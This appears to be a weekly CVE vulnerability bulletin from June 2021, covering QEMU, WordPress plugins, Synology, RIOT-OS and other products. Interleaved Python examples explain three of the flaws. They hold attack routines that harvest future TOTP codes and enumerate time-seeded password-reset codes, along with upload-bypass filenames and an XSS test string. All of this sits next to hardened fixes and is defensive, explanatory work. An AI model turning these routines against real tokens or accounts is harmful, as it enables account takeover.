An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp_input() function and could occur while processing a udp packet that is smaller than the size of the ‘udphdr’ structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3594
MISC
qemu — qemu
 
An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the tftp_input() function and could occur while processing a udp packet that is smaller than the size of the ‘tftp_t’ structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3595
MISC
qnap — nas
 
Insecure storage of sensitive information has been reported to affect QNAP NAS running myQNAPcloud Link. If exploited, this vulnerability allows remote attackers to read sensitive information by accessing the unrestricted storage mechanism. This issue affects: QNAP Systems Inc. myQNAPcloud Link versions prior to 2.2.21 on QTS 4.5.3; versions prior to 2.2.21 on QuTS hero h4.5.2; versions prior to 2.2.21 on QuTScloud c4.5.4. 2021-06-16 not yet calculated CVE-2021-28815
CONFIRM
quassel — quassel
 
Quassel through 0.13.1, when --require-ssl is enabled, launches without SSL or TLS support if a usable X.509 certificate is not found on the local system. 2021-06-17 not yet calculated CVE-2021-34825
MISC
rapid7 — nexpose
 
Rapid7 Nexpose is vulnerable to a non-persistent cross-site scripting vulnerability affecting the Security Console’s Filtered Asset Search feature. A specific search criterion and operator combination in Filtered Asset Search could have allowed a user to pass code through the provided search field. This issue affects version 6.6.80 and prior, and is fixed in 6.6.81. If your Security Console currently falls on or within this affected version range, ensure that you update your Security Console to the latest version. 2021-06-16 not yet calculated CVE-2021-3535
CONFIRM
receita — federal_irpf
 
Receita Federal IRPF 2021 1.7 allows a man-in-the-middle attack against the update feature. 2021-06-12 not yet calculated CVE-2021-34682
MISC
restund — restund
 
Restund is an open source NAT traversal server. The restund TURN server can be instructed to open a relay to the loopback address range. This allows you to reach any other service running on localhost which you might consider private. In the configuration that we ship (github.com/wireapp/ansible-restund/blob/master/templates/restund.conf.j2#L40-L43) the `status` interface of restund is enabled and is listening on `127.0.0.1`. The `status` interface allows users to issue administrative commands to `restund` like listing open relays or draining connections. It would be possible for an attacker to contact the status interface and issue administrative commands by setting `XOR-PEER-ADDRESS` to `127.0.0.1:{{restund_udp_status_port}}` when opening a TURN channel. We now explicitly disallow relaying to loopback addresses, ‘any’ addresses, link local addresses, and the broadcast address. As a workaround, disable the `status` module in your restund configuration. However, there might still be other services running on `127.0.0.0/8` that you do not want to have exposed. The `turn` module can be disabled. Restund will still perform STUN and this might already be enough for initiating calls in your environments. TURN is only used as a last resort when other NAT traversal options do not work. One should also make sure that the TURN server is set up with firewall rules so that it cannot relay to other addresses that you don’t want the TURN server to relay to, for example other services in the same VPC where the TURN server is running. Ideally TURN servers should be deployed in an isolated fashion where they can only reach what they need to reach to perform their task of assisting NAT traversal. 2021-06-11 not yet calculated CVE-2021-21382
MISC
CONFIRM
MISC
MISC
MISC
MISC
MISC
riot — riot-os
 
RIOT-OS 2021.01 before commit bc59d60be60dfc0a05def57d74985371e4f22d79 contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31663
MISC
MISC
CONFIRM
riot — riot-os
 
RIOT-OS 2021.01 before commit 07f1254d8537497552e7dce80364aaead9266bbe contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31662
CONFIRM
MISC
riot — riot-os
 
RIOT-OS 2021.01 before commit 609c9ada34da5546cffb632a98b7ba157c112658 contains a buffer overflow that could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31661
MISC
CONFIRM
riot — riot-os
 
RIOT-OS 2021.01 before commit 85da504d2dc30188b89f44c3276fc5a25b31251f contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31660
MISC
CONFIRM
riot — riot-os
 
RIOT-OS 2021.01 before commit 44741ff99f7a71df45420635b238b9c22093647a contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31664
MISC
CONFIRM
roanwiz — dext5editor
 
Parameter manipulation can bypass authentication, allowing file upload and execution of remote code. This issue affects: Raonwiz DEXT5Editor versions prior to 3.5.1405747.1100.03. 2021-06-15 not yet calculated CVE-2020-7864
MISC
safenet — keysource_management_console
 
SafeNet KeySecure Management Console 8.12.0 is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using a specially crafted URL to cause the server to return a split response once the URL is clicked. 2021-06-16 not yet calculated CVE-2021-28979
MISC
MISC
MISC
sap — netweaver_abap_server
 
SAP NetWeaver ABAP Server and ABAP Platform, versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 804, do not record information about internal and external RFC users in a consistent and distinguishable format, which could lead to improper authentication and may be exploited by malicious users to obtain illegitimate access to the system. 2021-06-16 not yet calculated CVE-2021-27610
MISC
MISC
secure_8 — secure_8
 
Secure 8 (Evalos) does not validate user input data correctly, allowing a remote attacker to perform a Blind SQL Injection. An attacker could exploit this vulnerability in order to extract information of users and administrator accounts stored in the database. 2021-06-18 not yet calculated CVE-2021-3604
CONFIRM
CONFIRM
sentinel — ldk_run-time_environment
 
The Sentinel LDK Run-Time Environment installer (Versions 7.6 and prior) adds a firewall rule named “Sentinel License Manager” that allows incoming connections from private networks using TCP Port 1947. While uninstalling, the uninstaller fails to close Port 1947. 2021-06-16 not yet calculated CVE-2021-32928
MISC
serenityos — serenityos
 
SerenityOS before commit 3844e8569689dd476064a0759d704bc64fb3ca2c contains a directory traversal vulnerability in tar/unzip that may lead to command execution or privilege escalation. 2021-06-18 not yet calculated CVE-2021-31272
MISC
MISC
MISC
CONFIRM
serenityos — test-crypto.cpp
 
SerenityOS in test-crypto.cpp contains a stack buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-33186
CONFIRM
serenityos — testbitmap
 
SerenityOS contains a buffer overflow in the set_range test in TestBitmap which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-33185
CONFIRM
sinamics — sm@rtserver
 
SINAMICS medium voltage routable products are affected by a vulnerability in the Sm@rtServer component for remote access that could allow an unauthenticated attacker to cause a denial-of-service condition, and/or execution of limited configuration modifications and/or execution of limited control commands on the SINAMICS Medium Voltage Products, Remote Access (SINAMICS SL150: All versions, SINAMICS SM150: All versions, SINAMICS SM150i: All versions). 2021-06-15 not yet calculated CVE-2021-27388
MISC
sing4g — 4gee_router_hh70vb_version_hh70_e1_02.00_22
 
An issue was discovered on 4GEE ROUTER HH70VB Version HH70_E1_02.00_22. Attackers can use the slowhttptest tool to send incomplete HTTP requests, which make the server keep waiting for the request to complete until its resources are exhausted, resulting in a denial of service of the web server. 2021-06-18 not yet calculated CVE-2021-33822
MISC
MISC
MISC
slim — nfc_70_10.01_devices
 
Protectimus SLIM NFC 70 10.01 devices allow a Time Traveler attack in which attackers can predict TOTP passwords in certain situations. The time value used by the device can be set independently from the used seed value for generating time-based one-time passwords, without authentication. Thus, an attacker with short-time physical access to a device can set the internal real-time clock (RTC) to the future, generate one-time passwords, and reset the clock to the current time. This allows the generation of valid future time-based one-time passwords without having further access to the hardware token. 2021-06-16 not yet calculated CVE-2021-32033
MISC
FULLDISC
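The Protectimus entry above turns on one property of TOTP: a code depends only on the seed and the time window, so a device whose real-time clock can be moved forward without authentication will hand out valid future codes. The following is an added example, not Protectimus code or the researchers' tooling: an RFC 6238 TOTP implementation (SHA-1, 30-second step), a constructed model of a token whose `set_clock` accepts any value, the harvest-then-reset sequence the advisory describes, and a server-side verifier showing that the harvested codes are accepted when their window arrives. The seed is the RFC 6238 test-vector seed and the timestamps are constructed.

```python
import hashlib
import hmac
import struct
from typing import Dict


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP with HMAC-SHA1 and dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{binary % (10 ** digits):0{digits}d}"


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP over the time-step counter."""
    return hotp(secret, unix_time // step, digits)


class Token:
    """Constructed model of a hardware token whose RTC is settable without authentication."""

    def __init__(self, seed: bytes) -> None:
        self._seed = seed        # never leaves the device
        self._rtc_offset = 0     # seconds the RTC is ahead of real time

    def set_clock(self, real_now: int, desired: int) -> None:
        # The reported flaw: no authentication is required to change the clock.
        self._rtc_offset = desired - real_now

    def display(self, real_now: int) -> str:
        return totp(self._seed, real_now + self._rtc_offset)


def harvest_future_codes(token: Token, real_now: int, windows: int,
                         step: int = 30) -> Dict[int, str]:
    """Time Traveler sequence: advance the clock one window at a time, record the
    displayed code, then restore the clock so the owner notices nothing."""
    codes: Dict[int, str] = {}
    for i in range(1, windows + 1):
        window_start = (real_now // step + i) * step
        token.set_clock(real_now, window_start)
        codes[window_start] = token.display(real_now)
    token.set_clock(real_now, real_now)  # reset to the current time
    return codes


def server_verify(seed: bytes, code: str, now: int, step: int = 30, skew: int = 1) -> bool:
    """Typical server check: accept the current window plus/minus `skew` windows."""
    accepted = False
    for d in range(-skew, skew + 1):
        if hmac.compare_digest(totp(seed, now + d * step), code):
            accepted = True
    return accepted


if __name__ == "__main__":
    seed = b"12345678901234567890"  # RFC 6238 test-vector seed
    now = 1_700_000_010              # constructed "current" time (a window boundary)
    token = Token(seed)
    future = harvest_future_codes(token, now, windows=3)
    for window, code in future.items():
        print(window, code, "accepted at that time:", server_verify(seed, code, window))
    print("token display restored:", token.display(now) == totp(seed, now))
```

Nothing on the server side distinguishes a harvested code from one read off the token at the right moment, so the only fixes are on the device: clock changes must require authentication or be bounded, and seed provisioning should not be separable from time setting.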
sonatype — nexus_repository_manager
 
Sonatype Nexus Repository Manager 3.x before 3.31.0 allows a remote authenticated attacker to get a list of blob files and read the content of a blob file (via a GET request) without having been granted access. 2021-06-18 not yet calculated CVE-2021-34553
CONFIRM
sonicos — sonicos
 
A buffer overflow vulnerability in SonicOS allows a remote attacker to cause a Denial of Service (DoS) by sending a specially crafted request. This vulnerability affects SonicOS Gen5, Gen6, Gen7 platforms, and SonicOSv virtual firewalls. 2021-06-14 not yet calculated CVE-2021-20027
CONFIRM
sourcecodester — alumni_management_system
 
SQL injection vulnerability in SourceCodester Alumni Management System 1.0 allows the user to inject SQL payload to bypass the authentication via admin/login.php. 2021-06-15 not yet calculated CVE-2020-29214
EXPLOIT-DB
sourcecodester — alumni_management_system
 
A cross-site scripting vulnerability in SourceCodester Employee Management System 1.0 allows a user to execute script (e.g., alert messages) via /Employee Management System/addemp.php in the admin account context. 2021-06-15 not yet calculated CVE-2020-29215
EXPLOIT-DB
stampit — supermixer
 
Prototype pollution in Stampit supermixer 1.0.3 allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation. 2021-06-16 not yet calculated CVE-2020-24939
CONFIRM
CONFIRM
MISC
striptags — striptags
 
The npm package “striptags” is an implementation of PHP’s strip_tags in Typescript. In striptags before version 3.2.0, a type-confusion vulnerability can cause `striptags` to concatenate unsanitized strings when an array-like object is passed in as the `html` parameter. This can be abused by an attacker who can control the shape of their input, e.g. if query parameters are passed directly into the function. This can lead to a XSS. 2021-06-18 not yet calculated CVE-2021-32696
MISC
MISC
CONFIRM
MISC
studio-42 — elfinder
 
The package studio-42/elfinder before 2.1.58 is vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP. 2021-06-13 not yet calculated CVE-2021-23394
CONFIRM
CONFIRM
CONFIRM
CONFIRM
sylabs — singularity
 
Sylabs Singularity 3.5.x and 3.6.x, and SingularityPRO before 3.5-8, has an Incorrect Check of a Function’s Return Value. 2021-06-15 not yet calculated CVE-2021-33622
MISC
MISC
symfony — symfony
 
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. A vulnerability related to firewall authentication is in Symfony starting with version 5.3.0 and prior to 5.3.2. When an application defines multiple firewalls, the token authenticated by one of the firewalls was available for all other firewalls. This could be abused when the application defines different providers for each part of the application, in such a situation, a user authenticated on a part of the application could be considered authenticated on the rest of the application. Starting in version 5.3.2, a patch ensures that the authenticated token is only available for the firewall that generates it. 2021-06-17 not yet calculated CVE-2021-32693
MISC
CONFIRM
MISC
MISC
synology — calendar
 
Use of hard-coded credentials vulnerability in php component in Synology Calendar before 2.4.0-0761 allows remote attackers to obtain sensitive information via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34812
CONFIRM
synology — download_station
 
Server-Side Request Forgery (SSRF) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to access intranet resources via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34811
CONFIRM
synology — download_station
 
Improper neutralization of special elements used in a command (‘Command Injection’) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34809
CONFIRM
synology — download_station
 
Improper privilege management vulnerability in cgi component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34810
CONFIRM
synology — media_server
 
Server-Side Request Forgery (SSRF) vulnerability in cgi component in Synology Media Server before 1.8.3-2881 allows remote attackers to access intranet resources via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34808
CONFIRM
teamviewer — teamviewer
 
TeamViewer before 14.7.48644 on Windows loads untrusted DLLs in certain situations. 2021-06-16 not yet calculated CVE-2021-34803
MISC
tenvoy — tenvoy
 
tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org. In versions prior to 7.0.3, the `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature that has a SHA-512 hash matching the SHA-512 hash of the message even if the signature was invalid. This issue is patched in version 7.0.3. As a workaround: In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`. 2021-06-16 not yet calculated CVE-2021-32685
MISC
MISC
CONFIRM
thycotic — password_reset_server
 
Thycotic Password Reset Server before 5.3.0 allows credential disclosure. 2021-06-11 not yet calculated CVE-2021-34679
MISC
tp-link — tl-wpa4220
 
TP-Link’s TL-WPA4220 4.0.2 Build 20180308 Rel.37064 does not use SSL by default. An attacker on the local network can monitor traffic and capture the cookie and other sensitive information. 2021-06-15 not yet calculated CVE-2021-28858
MISC
tp-link — tl-wpa4220
 
TP-Link’s TL-WPA4220 4.0.2 Build 20180308 Rel.37064 username and password are sent via the cookie. 2021-06-15 not yet calculated CVE-2021-28857
MISC
trend_micro — interscan_web_security_virtual_appliance
 
Trend Micro InterScan Web Security Virtual Appliance version 6.5 was found to have a reflected cross-site scripting (XSS) vulnerability in the product’s Captive Portal. 2021-06-17 not yet calculated CVE-2021-31521
MISC
trendnet — tw100-s4w1ca
 
In TrendNet TW100-S4W1CA 2.3.32, due to a lack of proper session controls, a threat actor could make unauthorized changes to an affected router via a specially crafted web page. If an authenticated user were to interact with a malicious web page it could allow for a complete takeover of the router. 2021-06-17 not yet calculated CVE-2021-32424
MISC
trendnet — tw100-s4w1ca
 
In TrendNet TW100-S4W1CA 2.3.32, it is possible to inject arbitrary JavaScript into the router’s web interface via the “echo” command. 2021-06-17 not yet calculated CVE-2021-32426
MISC
ubuntu — ubuntu
 
It was discovered that the get_modified_conffiles() function in backends/packaging-apt-dpkg.py allowed injecting modified package names in a manner that would confuse the dpkg(1) call. 2021-06-12 not yet calculated CVE-2021-32556
MISC
unegg — unegg
 
UnEGG v0.5 and earlier versions have an integer overflow vulnerability, triggered when the user opens a malformed specific file that is mishandled by UnEGG. Attackers could exploit this to achieve arbitrary code execution. This issue affects: Estsoft UnEGG 0.5 versions prior to 1.0 on linux. 2021-06-11 not yet calculated CVE-2020-7860
MISC
unifi_protect — g3_flex_camera_version
 
An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67. Attackers can use the slowhttptest tool to send incomplete HTTP requests, which make the server keep waiting for the request to complete until its resources are exhausted, resulting in a denial of service of the web server. 2021-06-18 not yet calculated CVE-2021-33818
MISC
MISC
MISC
unifi_protect — g3_flex_camera_version
 
An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67. An attacker could send a large number of TCP SYN packets to exhaust the web service’s resources, resulting in a denial of service of the web server. 2021-06-18 not yet calculated CVE-2021-33820
MISC
MISC
MISC
valine — valine
 
Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version. 2021-06-16 not yet calculated CVE-2021-34801
MISC
veryfitpro — veryfitpro
 
The VeryFitPro (com.veryfit2hr.second) application 3.2.8 for Android does all communication with the backend API over cleartext HTTP. This includes logins, registrations, and password change requests. This allows information theft and account takeover via network sniffing. 2021-06-16 not yet calculated CVE-2021-32612
MISC
MISC
MISC
FULLDISC
vmware — tools
 
VMware Tools for Windows (11.x.y prior to 11.3.0) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest operating system, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest operating system. 2021-06-18 not yet calculated CVE-2021-21997
MISC
wagtail — wagtail
 
Wagtail is an open source content management system built on Django. A cross-site scripting vulnerability exists in versions 2.13-2.13.1, versions 2.12-2.12.4, and versions prior to 2.11.8. When the `{% include_block %}` template tag is used to output the value of a plain-text StreamField block (`CharBlock`, `TextBlock` or a similar user-defined block derived from `FieldBlock`), and that block does not specify a template for rendering, the tag output is not properly escaped as HTML. This could allow users to insert arbitrary HTML or scripting. This vulnerability is only exploitable by users with the ability to author StreamField content (i.e. users with ‘editor’ access to the Wagtail admin). Patched versions have been released as Wagtail 2.11.8 (for the LTS 2.11 branch), Wagtail 2.12.5, and Wagtail 2.13.2 (for the current 2.13 branch). As a workaround, site implementors who are unable to upgrade to a current supported version should audit their use of `{% include_block %}` to ensure it is not used to output `CharBlock` / `TextBlock` values with no associated template. Note that this only applies where `{% include_block %}` is used directly on that block (uses of `include_block` on a block _containing_ a CharBlock / TextBlock, such as a StructBlock, are unaffected). In these cases, the tag can be replaced with Django’s `{{ … }}` syntax – e.g. `{% include_block my_title_block %}` becomes `{{ my_title_block }}`. 2021-06-17 not yet calculated CVE-2021-32681
MISC
MISC
CONFIRM
MISC
wibu-systems — codemeter
 
A buffer over-read vulnerability exists in Wibu-Systems CodeMeter versions < 7.21a. An unauthenticated remote attacker can exploit this issue to disclose heap memory contents or crash the CodeMeter Runtime Server. 2021-06-16 not yet calculated CVE-2021-20093
MISC
MISC
wibu-systems — codemeter
 
A denial of service vulnerability exists in Wibu-Systems CodeMeter versions < 7.21a. An unauthenticated remote attacker can exploit this issue to crash the CodeMeter Runtime Server. 2021-06-16 not yet calculated CVE-2021-20094
MISC
MISC
wire — wire
 
wire-webapp is the web version of Wire, an open-source messenger. A cross-site scripting vulnerability exists in wire-webapp prior to version 2021-06-01-production.0. If a user is instructed to open an image in a new tab (right click -> open in new tab, or copy the URL and paste it in the URL bar), the image payload is executed on the domain hosting the app (app.wire.com). In particular, if an image contains malicious code in addition to the actual picture, this code is executed on app.wire.com. This allows the attacker to fully control the user account. The vulnerability was patched in version 2021-06-01-production.0. As a workaround, users should not try to open image URLs. 2021-06-15 not yet calculated CVE-2021-32683
MISC
CONFIRM
wordpress — wordpress
 
The Gallery from files WordPress plugin through 1.6.0 provides the functionality of uploading images to the server. However, filenames are not properly sanitised before being output in an error message when they have an invalid extension, leading to a reflected Cross-Site Scripting issue. Due to the lack of a CSRF check, the attack could also be performed via that vector. 2021-06-14 not yet calculated CVE-2021-24349
CONFIRM
wordpress — wordpress
 
The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files; however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension’s case, for example, from “php” to “pHP”. 2021-06-14 not yet calculated CVE-2021-24347
CONFIRM
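The two upload entries above (Gallery from files, CVE-2021-24349, and SP Project & Document Manager, CVE-2021-24347) are the same pair of mistakes seen over and over in upload handlers: a case-sensitive deny list on the extension, and echoing the rejected filename unescaped. The following is an added example, not code from either plugin: the weak check modelled on the advisory beside a hardened version that lower-cases, uses an allow list, rejects path components, double extensions and dotfiles, stores the file under a random name, and builds the error message with HTML escaping. The extension lists are assumptions for illustration.

```python
import html
import os
import secrets

# Constructed lists; the deny list mirrors the kind of check the advisory describes.
BLOCKED_EXTENSIONS = {"php", "php3", "php5", "phtml", "phar"}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}


def vulnerable_is_allowed(filename: str) -> bool:
    """Flawed check: case-sensitive deny list on the last extension ("shell.pHP" passes)."""
    extension = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return extension not in BLOCKED_EXTENSIONS


def hardened_is_allowed(filename: str) -> bool:
    """Allow-list check on a normalised name.

    - rejects anything containing a path separator or NUL (no traversal)
    - lower-cases before comparing, so case variants cannot bypass it
    - every extension segment must be allowed, so "shell.php.jpg" is rejected
      (Apache-style multi-extension handling would otherwise execute it)
    - rejects dotfiles such as ".htaccess" and names with an empty extension
    """
    if not filename or any(c in filename for c in "/\\\x00"):
        return False
    if os.path.basename(filename) != filename:
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(part in ALLOWED_EXTENSIONS for part in parts[1:])


def storage_name(filename: str) -> str:
    """Never reuse the client-supplied name on disk: random name, validated extension."""
    if not hardened_is_allowed(filename):
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + "." + filename.rsplit(".", 1)[-1].lower()


def safe_error_message(filename: str) -> str:
    """Error text that reflects the filename without reflecting markup."""
    return f'File "{html.escape(filename)}" has an invalid extension.'


if __name__ == "__main__":
    for name in ("shell.php", "shell.pHP", "shell.php.jpg", "photo.JPG", ".htaccess"):
        print(f"{name:15} weak={vulnerable_is_allowed(name)!s:5} hardened={hardened_is_allowed(name)}")
    print(safe_error_message('<img src=x onerror=alert(1)>.exe'))
```

The CSRF half of the Gallery from files entry is not addressed by either check; that needs the nonce verification WordPress provides for form and AJAX handlers, which is outside this example.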
wordpress — wordpress
 
The Stock in & out WordPress plugin through 1.0.4 has a search functionality, the lowest accessible level to it being contributor. The srch POST parameter is not validated, sanitised or escaped before being used in the echo statement, leading to a reflected XSS issue. 2021-06-14 not yet calculated CVE-2021-24346
CONFIRM
MISC
wordpress — wordpress
 
In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, the lack of capability checks and insufficient nonce check on the AJAX actions, simple301redirects/admin/get_wildcard and simple301redirects/admin/wildcard, made it possible for authenticated users to retrieve and update the wildcard value for redirects. 2021-06-14 not yet calculated CVE-2021-24355
CONFIRM
MISC
wordpress — wordpress
 
The import_data function of the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4 had no capability or nonce checks making it possible for unauthenticated users to import a set of site redirects. 2021-06-14 not yet calculated CVE-2021-24353
CONFIRM
MISC
wordpress — wordpress
 
In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites. 2021-06-14 not yet calculated CVE-2021-24356
CONFIRM
MISC
wordpress — wordpress
 
The export_data function of the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4 had no capability or nonce checks making it possible for unauthenticated users to export a site’s redirects. 2021-06-14 not yet calculated CVE-2021-24352
CONFIRM
MISC
wordpress — wordpress
 
The Smart Slider 3 Free and pro WordPress plugins before 3.5.0.9 did not sanitise the Project Name before outputting it back in the page, leading to a Stored Cross-Site Scripting issue. By default, only administrator users could access the affected functionality, limiting the exploitability of the vulnerability. However, some WordPress admins may allow lesser privileged users to access the plugin’s functionality, in which case, privilege escalation could be performed. 2021-06-14 not yet calculated CVE-2021-24382
CONFIRM
MISC
wordpress — wordpress
 
When deleting a date in the Xllentech English Islamic Calendar WordPress plugin before 2.6.8, the year_number and month_number POST parameters are not sanitised, escaped or validated before being used in a SQL statement, leading to SQL injection. 2021-06-14 not yet calculated CVE-2021-24341
CONFIRM
MISC
wordpress — wordpress
 
The menu delete functionality of the Side Menu – add fixed side buttons WordPress plugin before 3.1.5, available to Administrator users, takes the did GET parameter and uses it in an SQL statement without proper sanitisation, validation or escaping, therefore leading to a SQL Injection issue. 2021-06-14 not yet calculated CVE-2021-24348
CONFIRM
MISC
wordpress — wordpress
 
The theplus_more_post AJAX action of The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.12 did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting issue (exploitable against both unauthenticated and authenticated users). 2021-06-14 not yet calculated CVE-2021-24351
MISC
CONFIRM
wordpress — wordpress
 
A lack of capability checks and insufficient nonce check on the AJAX action in the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, made it possible for authenticated users to install arbitrary plugins on vulnerable sites. 2021-06-14 not yet calculated CVE-2021-24354
CONFIRM
MISC
wordpress — wordpress
 
The page lists-management feature of the Sendit WP Newsletter WordPress plugin through 2.5.1, available to Administrator users, does not sanitise, validate or escape the id_lista POST parameter before using it in an SQL statement, therefore leading to Blind SQL Injection. 2021-06-14 not yet calculated CVE-2021-24345
CONFIRM
MISC
wowonder — wowonder
 
In WoWonder 3.0.4, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day. 2021-06-11 not yet calculated CVE-2021-27200
MISC
MISC
MISC
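The WoWonder entry above is the standard password-reset failure: a recovery code derived from the time of day has a search space an attacker can enumerate. The following is an added example, not WoWonder's recover.php: a constructed time-seeded generator standing in for the weak scheme (the advisory does not give the exact algorithm, so the seeding here is an assumption), the attacker's enumeration of every candidate within a window around the request time, and a replacement token store that issues CSPRNG tokens, keeps only their hashes, expires them, and makes them single-use.

```python
import hashlib
import hmac
import random
import secrets
from typing import Dict, Optional, Set, Tuple


def weak_reset_code(issued_at: int) -> str:
    """Constructed model of a time-derived reset code (assumed, not WoWonder's exact scheme):
    the PRNG is seeded with the issue time, so the code is a function of the clock only."""
    rng = random.Random(issued_at)
    return f"{rng.randrange(10 ** 6):06d}"


def attacker_candidates(guessed_issue_time: int, slack: int = 60) -> Set[str]:
    """Everything the victim's code could be if the attacker knows the issue time to within `slack` s."""
    return {weak_reset_code(t)
            for t in range(guessed_issue_time - slack, guessed_issue_time + slack + 1)}


class ResetTokenStore:
    """Hardened replacement: unguessable token, stored hashed, time-limited, single-use."""

    def __init__(self, ttl_seconds: int = 900) -> None:
        self._ttl = ttl_seconds
        self._pending: Dict[str, Tuple[str, int]] = {}  # sha256(token) -> (user, expiry)

    def issue(self, user: str, now: int) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[digest] = (user, now + self._ttl)
        return token  # sent to the user out of band; only the hash is kept

    def redeem(self, token: str, now: int) -> Optional[str]:
        """Return the user the token belongs to, or None if unknown, expired or already used."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        for stored, (user, expiry) in list(self._pending.items()):
            if hmac.compare_digest(stored, digest):
                del self._pending[stored]  # single use, even if expired
                return user if now <= expiry else None
        return None


if __name__ == "__main__":
    issued = 1_700_000_000               # constructed request time
    victim_code = weak_reset_code(issued)
    guesses = attacker_candidates(issued + 25, slack=60)  # attacker's clock is off by 25 s
    print(f"victim code {victim_code} in {len(guesses)} candidates: {victim_code in guesses}")
    store = ResetTokenStore()
    token = store.issue("alice", now=issued)
    print("redeem:", store.redeem(token, issued + 60), "again:", store.redeem(token, issued + 61))
```

A six-digit code is not the problem in itself; a six-digit code that can be regenerated from the request timestamp is. Rate limiting on the recovery endpoint helps, but with at most a few hundred candidates it is not a substitute for an unpredictable token.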
zettlr — zettlr
 
No filtering of cross-site scripting (XSS) payloads in the markdown-editor in Zettlr 1.8.7 allows attackers to perform remote code execution via a crafted file. 2021-06-18 not yet calculated CVE-2021-26835
MISC
MISC
znote — znote
 
A cross-site scripting (XSS) vulnerability exists in Znote 0.5.2. An attacker can insert payloads, and the code execution will happen immediately on markdown view mode. 2021-06-18 not yet calculated CVE-2021-26834
MISC
MISC
zoho — manageengine_password_manager_pro
 
In Zoho ManageEngine Password Manager Pro before 11.1 build 11104, attackers are able to retrieve credentials via a browser extension for non-website resource types. 2021-06-16 not yet calculated CVE-2021-31857
MISC
CONFIRM
zoho — manageengine_servicedesk_plus
 
Zoho ManageEngine ServiceDesk Plus MSP before 10519 is vulnerable to a User Enumeration bug due to improper error-message generation in the Forgot Password functionality, aka SDPMSP-15732. 2021-06-16 not yet calculated CVE-2021-31159
CONFIRM
MISC
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, versions prior to 2.2: The affected products contain credentials stored in plaintext. This could allow an attacker to gain access to sensitive information. 2021-06-16 not yet calculated CVE-2021-27487
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, versions prior to 2.2: The affected product’s web application could allow a low-privilege user to inject parameters containing malicious scripts that are executed by higher-privilege users. 2021-06-16 not yet calculated CVE-2021-27479
MISC
zoll — defibrillator_dashboard
 
